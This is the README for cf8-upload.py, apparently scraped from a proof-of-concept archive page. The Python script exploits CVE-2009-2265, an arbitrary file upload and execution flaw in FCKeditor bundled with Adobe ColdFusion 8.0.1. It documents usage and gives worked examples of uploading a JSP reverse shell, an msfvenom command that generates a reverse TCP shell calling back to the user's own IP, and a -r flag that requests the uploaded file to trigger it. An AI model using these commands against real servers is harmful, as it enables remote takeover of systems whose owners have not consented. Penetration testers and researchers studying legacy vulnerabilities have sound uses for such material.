来源

关联漏洞

描述

cf8-upload.py | CVE-2009-2265

介绍

# cf8-upload.py ⭐
a python3 script to exploit CVE-2009-2265.

## the exploit - CVE-2009-2265 ❗
the script exploits a vulnerability found in FCKeditor < 2.6.4.1 which was implemented into adobe coldfusion 8.0.1:  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2265  
the script allows the  user to submit a file to upload to a target computer
running coldfusion 8.0.1 and execute it.
***

## prerequisites ✔
* python3
* requests module for python3. can be installed with:
```
pip3 install requests
```
***

## usage ℹ
After identifying a target running adobe coldfusion 8.0.1, run with:
```
chmod +x cf8-upload.py
./cf8-upload.py -h
```
or
```
python3 cf8-upload.py -h
```
the -h or --help option shows how to run the script with a few examples.
there are two positional arguments and a few optional arguments.
```
./cf8-upload.py --help                     
usage: cf8-upload.py [-h] [-a] [-n] [-r] address path

./cf8-upload.py exploits an LFI vulnerability in
adobe coldfusion 8.0.1

positional arguments:
  address           ip/hostname, port, sub-directories to the adobe
                    coldfusion 8.0.1 server
  path              path to file you wish to upload (eg.
                    '/path/to/file.txt')

optional arguments:
  -h, --help        show this help message and exit
  -a, --accessible  turns off features which may negatively affect
                    screen readers
  -n, --no-colour   removes colour output
  -r, --request     request webpage after successfully uploading
                    file

examples:
        ./cf8-upload.py 10.10.10.10 file.txt
        ./cf8-upload.py 10.10.10.10:8500 /path/to/reverse-shell.jsp -r
        ./cf8-upload.py hostname:8500/sub-dir /path/to/upload.zip -n
```
adobe coldfusion uses port 8500 by default but the full path to the server must be specified when executing the script.  
a default installation of coldfusion may well reside in the root directory on port 8500 in which case `x.x.x.x:8500` will most likely suffice for the address argument when executing the script.

### --accessible argument:
`cf8-upload.py` by default, prints in colour and with some additional formatting to the terminal output, however this is not always helpful for those that use screenreaders. using the `--accessible` argument will disable fancy formatting and colour from being printed to the terminal. it will also disable ascii art.

### --request argument:
this flag makes the script perform a get request to the file, and only after it has been successfully uploaded. this option is useful if the user is uploading a reverse shell of some kind to the vulnerable application and wishes to immediately trigger it. the content of the get request is not printed to the terminal and only serves to trigger the event on the server.

### reverse shell example:
adobe coldfusion is able to read from `.jsp` files so a reverse shell can be created in `msfvenom` with something as simple as:
```
msfvenom -p java/jsp_shell_reverse_tcp lhost=[my ip] lport=[my listening port] -f raw > rshell.jsp
```
and uploaded:
```
./cf8-upload.py 10.10.10.10:8500 /path/to/rshell.jsp -r
```
***

## limitations ⚠
### timeout requests
the adobe coldfusion 8.0.1 application may not have the ability to overwrite existing files that get uploaded with the exploit script. in which case, uploading a different file with the same name as a previously uploaded file may result in timeouts during the uploading process.  
you may need to rename the file you want to upload to something else before attempting to reupload.

## notes 📝
the script was mainly an exercise in creating a short, comprehensive, self-contained program for a single exploit with both readability and accessibility in mind.
***

## credits 👍
https://skerritt.blog/a11y/ - accessibility implementation.

文件快照

 [4.0K]  /data/pocs/a65e7ff1479c86c8e1ea537f1d111347732210cc
├── [8.0K]  cf8-upload.py
└── [3.7K]  README.md

0 directories, 2 files

备注